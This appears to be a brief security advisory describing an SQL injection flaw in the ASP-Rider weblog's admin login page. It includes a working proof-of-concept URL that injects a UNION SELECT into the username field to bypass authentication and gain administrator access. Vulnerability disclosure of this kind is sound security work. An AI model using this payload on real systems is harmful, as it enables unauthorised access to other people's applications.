ASP-Rider Remote SQL Injection Vulnerability

ASP-Rider Remote SQL Injection Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided. It will allow an attacker to bypass the required authentication for administrator access to the affected application.

http://www.example.com/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1